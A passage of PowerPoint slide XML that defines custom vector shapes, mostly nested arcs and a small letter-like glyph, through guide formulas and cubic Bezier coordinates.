                      <a:pt x="32" y="63"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="63"/>
                      <a:pt x="0" y="49"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="14"/>
                      <a:pt x="15" y="0"/>
                      <a:pt x="32" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="6"/>
                      <a:pt x="32" y="6"/>
                      <a:pt x="32" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="6"/>
                      <a:pt x="7" y="17"/>
                      <a:pt x="7" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="18" y="57"/>
                      <a:pt x="32" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="57"/>
                      <a:pt x="58" y="46"/>
                      <a:pt x="58" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="32"/>
                      <a:pt x="64" y="32"/>
                      <a:pt x="64" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="49"/>
                      <a:pt x="50" y="63"/>
                      <a:pt x="32"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4"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6500813" y="1138238"/>
                <a:ext cx="171450" cy="174625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 83"/>
                  <a:gd name="T1" fmla="*/ 85 h 85"/>
                  <a:gd name="T2" fmla="*/ 0 w 83"/>
                  <a:gd name="T3" fmla="*/ 43 h 85"/>
                  <a:gd name="T4" fmla="*/ 42 w 83"/>
                  <a:gd name="T5" fmla="*/ 0 h 85"/>
                  <a:gd name="T6" fmla="*/ 42 w 83"/>
                  <a:gd name="T7" fmla="*/ 7 h 85"/>
                  <a:gd name="T8" fmla="*/ 6 w 83"/>
                  <a:gd name="T9" fmla="*/ 43 h 85"/>
                  <a:gd name="T10" fmla="*/ 42 w 83"/>
                  <a:gd name="T11" fmla="*/ 79 h 85"/>
                  <a:gd name="T12" fmla="*/ 77 w 83"/>
                  <a:gd name="T13" fmla="*/ 52 h 85"/>
                  <a:gd name="T14" fmla="*/ 83 w 83"/>
                  <a:gd name="T15" fmla="*/ 54 h 85"/>
                  <a:gd name="T16" fmla="*/ 42 w 83"/>
                  <a:gd name="T1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5">
                    <a:moveTo>
                      <a:pt x="42" y="85"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="85"/>
                      <a:pt x="0" y="66"/>
                      <a:pt x="0" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="19"/>
                      <a:pt x="19" y="0"/>
                      <a:pt x="42" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="7"/>
                      <a:pt x="42" y="7"/>
                      <a:pt x="42" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="7"/>
                      <a:pt x="6" y="23"/>
                      <a:pt x="6" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="62"/>
                      <a:pt x="22" y="79"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="79"/>
                      <a:pt x="73" y="68"/>
                      <a:pt x="77" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="54"/>
                      <a:pt x="83" y="54"/>
                      <a:pt x="83" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="72"/>
                      <a:pt x="61" y="85"/>
                      <a:pt x="42"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5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6481763" y="1117600"/>
                <a:ext cx="201613" cy="215900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 99"/>
                  <a:gd name="T1" fmla="*/ 105 h 105"/>
                  <a:gd name="T2" fmla="*/ 0 w 99"/>
                  <a:gd name="T3" fmla="*/ 53 h 105"/>
                  <a:gd name="T4" fmla="*/ 52 w 99"/>
                  <a:gd name="T5" fmla="*/ 0 h 105"/>
                  <a:gd name="T6" fmla="*/ 52 w 99"/>
                  <a:gd name="T7" fmla="*/ 6 h 105"/>
                  <a:gd name="T8" fmla="*/ 6 w 99"/>
                  <a:gd name="T9" fmla="*/ 53 h 105"/>
                  <a:gd name="T10" fmla="*/ 52 w 99"/>
                  <a:gd name="T11" fmla="*/ 99 h 105"/>
                  <a:gd name="T12" fmla="*/ 94 w 99"/>
                  <a:gd name="T13" fmla="*/ 73 h 105"/>
                  <a:gd name="T14" fmla="*/ 99 w 99"/>
                  <a:gd name="T15" fmla="*/ 76 h 105"/>
                  <a:gd name="T16" fmla="*/ 52 w 99"/>
                  <a:gd name="T17"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05">
                    <a:moveTo>
                      <a:pt x="52" y="105"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="105"/>
                      <a:pt x="0" y="82"/>
                      <a:pt x="0" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="23" y="0"/>
                      <a:pt x="52" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="6"/>
                      <a:pt x="52" y="6"/>
                      <a:pt x="52" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="6"/>
                      <a:pt x="6" y="27"/>
                      <a:pt x="6" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="78"/>
                      <a:pt x="27" y="99"/>
                      <a:pt x="52" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="99"/>
                      <a:pt x="86" y="89"/>
                      <a:pt x="94" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="76"/>
                      <a:pt x="99" y="76"/>
                      <a:pt x="99" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="94"/>
                      <a:pt x="72" y="105"/>
                      <a:pt x="5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86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6457950" y="1096963"/>
                <a:ext cx="231775" cy="258763"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 113"/>
                  <a:gd name="T1" fmla="*/ 126 h 126"/>
                  <a:gd name="T2" fmla="*/ 0 w 113"/>
                  <a:gd name="T3" fmla="*/ 63 h 126"/>
                  <a:gd name="T4" fmla="*/ 63 w 113"/>
                  <a:gd name="T5" fmla="*/ 0 h 126"/>
                  <a:gd name="T6" fmla="*/ 63 w 113"/>
                  <a:gd name="T7" fmla="*/ 6 h 126"/>
                  <a:gd name="T8" fmla="*/ 6 w 113"/>
                  <a:gd name="T9" fmla="*/ 63 h 126"/>
                  <a:gd name="T10" fmla="*/ 63 w 113"/>
                  <a:gd name="T11" fmla="*/ 120 h 126"/>
                  <a:gd name="T12" fmla="*/ 108 w 113"/>
                  <a:gd name="T13" fmla="*/ 98 h 126"/>
                  <a:gd name="T14" fmla="*/ 113 w 113"/>
                  <a:gd name="T15" fmla="*/ 101 h 126"/>
                  <a:gd name="T16" fmla="*/ 63 w 113"/>
                  <a:gd name="T17"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26">
                    <a:moveTo>
                      <a:pt x="63" y="126"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="126"/>
                      <a:pt x="0" y="97"/>
                      <a:pt x="0" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="28"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="6"/>
                      <a:pt x="63" y="6"/>
                      <a:pt x="63" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="6"/>
                      <a:pt x="6" y="31"/>
                      <a:pt x="6" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="94"/>
                      <a:pt x="32" y="120"/>
                      <a:pt x="63" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="120"/>
                      <a:pt x="97" y="112"/>
                      <a:pt x="108" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="101"/>
                      <a:pt x="113" y="101"/>
                      <a:pt x="113" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="117"/>
                      <a:pt x="83" y="126"/>
                      <a:pt x="63"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6437313" y="1074738"/>
                <a:ext cx="288925" cy="301625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 141"/>
                  <a:gd name="T1" fmla="*/ 147 h 147"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 74 h 147"/>
                  <a:gd name="T4" fmla="*/ 73 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 147"/>
                  <a:gd name="T6" fmla="*/ 73 w 141"/>
                  <a:gd name="T7" fmla="*/ 6 h 147"/>
                  <a:gd name="T8" fmla="*/ 6 w 141"/>
                  <a:gd name="T9" fmla="*/ 74 h 147"/>
                  <a:gd name="T10" fmla="*/ 73 w 141"/>
                  <a:gd name="T11" fmla="*/ 141 h 147"/>
                  <a:gd name="T12" fmla="*/ 135 w 141"/>
                  <a:gd name="T13" fmla="*/ 100 h 147"/>
                  <a:gd name="T14" fmla="*/ 141 w 141"/>
                  <a:gd name="T15" fmla="*/ 102 h 147"/>
                  <a:gd name="T16" fmla="*/ 73 w 141"/>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7">
                    <a:moveTo>
                      <a:pt x="73" y="147"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="147"/>
                      <a:pt x="0" y="114"/>
                      <a:pt x="0" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="33"/>
                      <a:pt x="33" y="0"/>
                      <a:pt x="73" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="6"/>
                      <a:pt x="73" y="6"/>
                      <a:pt x="73" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="6"/>
                      <a:pt x="6" y="36"/>
                      <a:pt x="6" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="111"/>
                      <a:pt x="36" y="141"/>
                      <a:pt x="73" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="141"/>
                      <a:pt x="125" y="125"/>
                      <a:pt x="135" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="102"/>
                      <a:pt x="141" y="102"/>
                      <a:pt x="141" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="129"/>
                      <a:pt x="103" y="147"/>
                      <a:pt x="73"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8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6415088" y="1054100"/>
                <a:ext cx="173038" cy="344488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 84 w 84"/>
                  <a:gd name="T1" fmla="*/ 168 h 168"/>
                  <a:gd name="T2" fmla="*/ 0 w 84"/>
                  <a:gd name="T3" fmla="*/ 84 h 168"/>
                  <a:gd name="T4" fmla="*/ 84 w 84"/>
                  <a:gd name="T5" fmla="*/ 0 h 168"/>
                  <a:gd name="T6" fmla="*/ 84 w 84"/>
                  <a:gd name="T7" fmla="*/ 6 h 168"/>
                  <a:gd name="T8" fmla="*/ 6 w 84"/>
                  <a:gd name="T9" fmla="*/ 84 h 168"/>
                  <a:gd name="T10" fmla="*/ 84 w 84"/>
                  <a:gd name="T11" fmla="*/ 161 h 168"/>
                  <a:gd name="T12" fmla="*/ 84 w 84"/>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84" h="168">
                    <a:moveTo>
                      <a:pt x="84" y="168"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="168"/>
                      <a:pt x="0" y="130"/>
                      <a:pt x="0" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="37"/>
                      <a:pt x="38" y="0"/>
                      <a:pt x="84" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="6"/>
                      <a:pt x="84" y="6"/>
                      <a:pt x="84" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="6"/>
                      <a:pt x="6" y="41"/>
                      <a:pt x="6" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="126"/>
                      <a:pt x="41" y="161"/>
                      <a:pt x="84" y="161"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="84"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p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6394450" y="1031875"/>
                <a:ext cx="303213" cy="387350"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 94 w 148"/>
                  <a:gd name="T1" fmla="*/ 189 h 189"/>
                  <a:gd name="T2" fmla="*/ 0 w 148"/>
                  <a:gd name="T3" fmla="*/ 95 h 189"/>
                  <a:gd name="T4" fmla="*/ 94 w 148"/>
                  <a:gd name="T5" fmla="*/ 0 h 189"/>
                  <a:gd name="T6" fmla="*/ 94 w 148"/>
                  <a:gd name="T7" fmla="*/ 6 h 189"/>
                  <a:gd name="T8" fmla="*/ 6 w 148"/>
                  <a:gd name="T9" fmla="*/ 95 h 189"/>
                  <a:gd name="T10" fmla="*/ 94 w 148"/>
                  <a:gd name="T11" fmla="*/ 183 h 189"/>
                  <a:gd name="T12" fmla="*/ 144 w 148"/>
                  <a:gd name="T13" fmla="*/ 167 h 189"/>
                  <a:gd name="T14" fmla="*/ 148 w 148"/>
                  <a:gd name="T15" fmla="*/ 172 h 189"/>
                  <a:gd name="T16" fmla="*/ 94 w 148"/>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189">
                    <a:moveTo>
                      <a:pt x="94" y="189"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="189"/>
                      <a:pt x="0" y="147"/>
                      <a:pt x="0" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="43"/>
                      <a:pt x="42" y="0"/>
                      <a:pt x="94" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="6"/>
                      <a:pt x="94" y="6"/>
                      <a:pt x="94" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="6"/>
                      <a:pt x="6" y="46"/>
                      <a:pt x="6" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="143"/>
                      <a:pt x="45" y="183"/>
                      <a:pt x="94" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="183"/>
                      <a:pt x="130" y="177"/>
                      <a:pt x="144" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="172"/>
                      <a:pt x="148" y="172"/>
                      <a:pt x="148" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="183"/>
                      <a:pt x="113" y="189"/>
                      <a:pt x="94" y="1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90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6372225" y="1011238"/>
                <a:ext cx="395288" cy="428625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 105 w 193"/>
                  <a:gd name="T1" fmla="*/ 209 h 209"/>
                  <a:gd name="T2" fmla="*/ 0 w 193"/>
                  <a:gd name="T3" fmla="*/ 105 h 209"/>
                  <a:gd name="T4" fmla="*/ 105 w 193"/>
                  <a:gd name="T5" fmla="*/ 0 h 209"/>
                  <a:gd name="T6" fmla="*/ 105 w 193"/>
                  <a:gd name="T7" fmla="*/ 6 h 209"/>
                  <a:gd name="T8" fmla="*/ 6 w 193"/>
                  <a:gd name="T9" fmla="*/ 105 h 209"/>
                  <a:gd name="T10" fmla="*/ 105 w 193"/>
                  <a:gd name="T11" fmla="*/ 203 h 209"/>
                  <a:gd name="T12" fmla="*/ 187 w 193"/>
                  <a:gd name="T13" fmla="*/ 159 h 209"/>
                  <a:gd name="T14" fmla="*/ 193 w 193"/>
                  <a:gd name="T15" fmla="*/ 163 h 209"/>
                  <a:gd name="T16" fmla="*/ 105 w 193"/>
                  <a:gd name="T1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209">
                    <a:moveTo>
                      <a:pt x="105" y="209"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="209"/>
                      <a:pt x="0" y="162"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="47"/>
                      <a:pt x="47" y="0"/>
                      <a:pt x="105" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="6"/>
                      <a:pt x="105" y="6"/>
                      <a:pt x="105" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="6"/>
                      <a:pt x="6" y="50"/>
                      <a:pt x="6" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="159"/>
                      <a:pt x="51" y="203"/>
                      <a:pt x="105" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="203"/>
                      <a:pt x="169" y="187"/>
                      <a:pt x="187" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="163"/>
                      <a:pt x="193" y="163"/>
                      <a:pt x="193" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="192"/>
                      <a:pt x="140" y="209"/>
                      <a:pt x="105"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6351588" y="987425"/>
                <a:ext cx="403225" cy="474663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 115 w 197"/>
                  <a:gd name="T1" fmla="*/ 231 h 231"/>
                  <a:gd name="T2" fmla="*/ 0 w 197"/>
                  <a:gd name="T3" fmla="*/ 116 h 231"/>
                  <a:gd name="T4" fmla="*/ 115 w 197"/>
                  <a:gd name="T5" fmla="*/ 0 h 231"/>
                  <a:gd name="T6" fmla="*/ 115 w 197"/>
                  <a:gd name="T7" fmla="*/ 6 h 231"/>
                  <a:gd name="T8" fmla="*/ 6 w 197"/>
                  <a:gd name="T9" fmla="*/ 116 h 231"/>
                  <a:gd name="T10" fmla="*/ 115 w 197"/>
                  <a:gd name="T11" fmla="*/ 225 h 231"/>
                  <a:gd name="T12" fmla="*/ 193 w 197"/>
                  <a:gd name="T13" fmla="*/ 192 h 231"/>
                  <a:gd name="T14" fmla="*/ 197 w 197"/>
                  <a:gd name="T15" fmla="*/ 197 h 231"/>
                  <a:gd name="T16" fmla="*/ 115 w 197"/>
                  <a:gd name="T17" fmla="*/ 23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231">
                    <a:moveTo>
                      <a:pt x="115" y="231"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="231"/>
                      <a:pt x="0" y="179"/>
                      <a:pt x="0" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="52"/>
                      <a:pt x="52" y="0"/>
                      <a:pt x="115" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="6"/>
                      <a:pt x="115" y="6"/>
                      <a:pt x="115" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="6"/>
                      <a:pt x="6" y="55"/>
                      <a:pt x="6" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="176"/>
                      <a:pt x="55" y="225"/>
                      <a:pt x="115" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="225"/>
                      <a:pt x="172" y="213"/>
                      <a:pt x="193" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="197"/>
                      <a:pt x="197" y="197"/>
                      <a:pt x="197" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="219"/>
                      <a:pt x="146" y="231"/>
                      <a:pt x="115" y="2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2"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6329363" y="968375"/>
                <a:ext cx="366713" cy="514350"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 126 w 179"/>
                  <a:gd name="T1" fmla="*/ 251 h 251"/>
                  <a:gd name="T2" fmla="*/ 0 w 179"/>
                  <a:gd name="T3" fmla="*/ 126 h 251"/>
                  <a:gd name="T4" fmla="*/ 126 w 179"/>
                  <a:gd name="T5" fmla="*/ 0 h 251"/>
                  <a:gd name="T6" fmla="*/ 126 w 179"/>
                  <a:gd name="T7" fmla="*/ 6 h 251"/>
                  <a:gd name="T8" fmla="*/ 7 w 179"/>
                  <a:gd name="T9" fmla="*/ 126 h 251"/>
                  <a:gd name="T10" fmla="*/ 126 w 179"/>
                  <a:gd name="T11" fmla="*/ 245 h 251"/>
                  <a:gd name="T12" fmla="*/ 176 w 179"/>
                  <a:gd name="T13" fmla="*/ 234 h 251"/>
                  <a:gd name="T14" fmla="*/ 179 w 179"/>
                  <a:gd name="T15" fmla="*/ 240 h 251"/>
                  <a:gd name="T16" fmla="*/ 126 w 179"/>
                  <a:gd name="T17" fmla="*/ 251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251">
                    <a:moveTo>
                      <a:pt x="126" y="251"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="251"/>
                      <a:pt x="0" y="195"/>
                      <a:pt x="0" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="56"/>
                      <a:pt x="57" y="0"/>
                      <a:pt x="126" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="6"/>
                      <a:pt x="126" y="6"/>
                      <a:pt x="126" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="6"/>
                      <a:pt x="7" y="60"/>
                      <a:pt x="7" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="192"/>
                      <a:pt x="60" y="245"/>
                      <a:pt x="126" y="245"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="245"/>
                      <a:pt x="161" y="241"/>
                      <a:pt x="176" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="240"/>
                      <a:pt x="179" y="240"/>
                      <a:pt x="179" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="247"/>
                      <a:pt x="145" y="251"/>
                      <a:pt x="126"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5381625" y="808038"/>
                <a:ext cx="28575" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 26 h 44"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 38 h 44"/>
                  <a:gd name="T4" fmla="*/ 8 w 14"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 14"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 14"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 8 w 14"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 14 w 14"/>
                  <a:gd name="T13" fmla="*/ 6 h 44"/>
                  <a:gd name="T14" fmla="*/ 14 w 14"/>
                  <a:gd name="T15" fmla="*/ 18 h 44"/>
                  <a:gd name="T16" fmla="*/ 11 w 14"/>
                  <a:gd name="T17" fmla="*/ 22 h 44"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 26 h 44"/>
                  <a:gd name="T20" fmla="*/ 9 w 14"/>
                  <a:gd name="T21" fmla="*/ 7 h 44"/>
                  <a:gd name="T22" fmla="*/ 7 w 14"/>
                  <a:gd name="T23" fmla="*/ 5 h 44"/>
                  <a:gd name="T24" fmla="*/ 4 w 14"/>
                  <a:gd name="T25" fmla="*/ 5 h 44"/>
                  <a:gd name="T26" fmla="*/ 4 w 14"/>
                  <a:gd name="T27" fmla="*/ 20 h 44"/>
                  <a:gd name="T28" fmla="*/ 7 w 14"/>
                  <a:gd name="T29" fmla="*/ 20 h 44"/>
                  <a:gd name="T30" fmla="*/ 9 w 14"/>
                  <a:gd name="T31" fmla="*/ 17 h 44"/>
                  <a:gd name="T32" fmla="*/ 9 w 14"/>
                  <a:gd name="T33" fmla="*/ 7 h 44"/>
                  <a:gd name="T34" fmla="*/ 9 w 14"/>
                  <a:gd name="T35" fmla="*/ 27 h 44"/>
                  <a:gd name="T36" fmla="*/ 7 w 14"/>
                  <a:gd name="T37" fmla="*/ 24 h 44"/>
                  <a:gd name="T38" fmla="*/ 4 w 14"/>
                  <a:gd name="T39" fmla="*/ 24 h 44"/>
                  <a:gd name="T40" fmla="*/ 4 w 14"/>
                  <a:gd name="T41" fmla="*/ 40 h 44"/>
                  <a:gd name="T42" fmla="*/ 7 w 14"/>
                  <a:gd name="T43" fmla="*/ 40 h 44"/>
                  <a:gd name="T44" fmla="*/ 9 w 14"/>
                  <a:gd name="T45" fmla="*/ 37 h 44"/>
                  <a:gd name="T46" fmla="*/ 9 w 14"/>
                  <a:gd name="T4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 h="44">
                    <a:moveTo>
                      <a:pt x="14" y="26"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="38"/>
                      <a:pt x="14" y="38"/>
                      <a:pt x="14" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="42"/>
                      <a:pt x="11" y="44"/>
                      <a:pt x="8" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="14" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="18"/>
                      <a:pt x="14" y="18"/>
                      <a:pt x="14" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="18"/>
                      <a:pt x="14" y="21"/>
                      <a:pt x="11" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="23"/>
                      <a:pt x="14" y="26"/>
                      <a:pt x="14" y="26"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="5"/>
                      <a:pt x="8" y="5"/>
                      <a:pt x="7" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="20"/>
                      <a:pt x="4" y="20"/>
                      <a:pt x="4" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="20"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="7" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
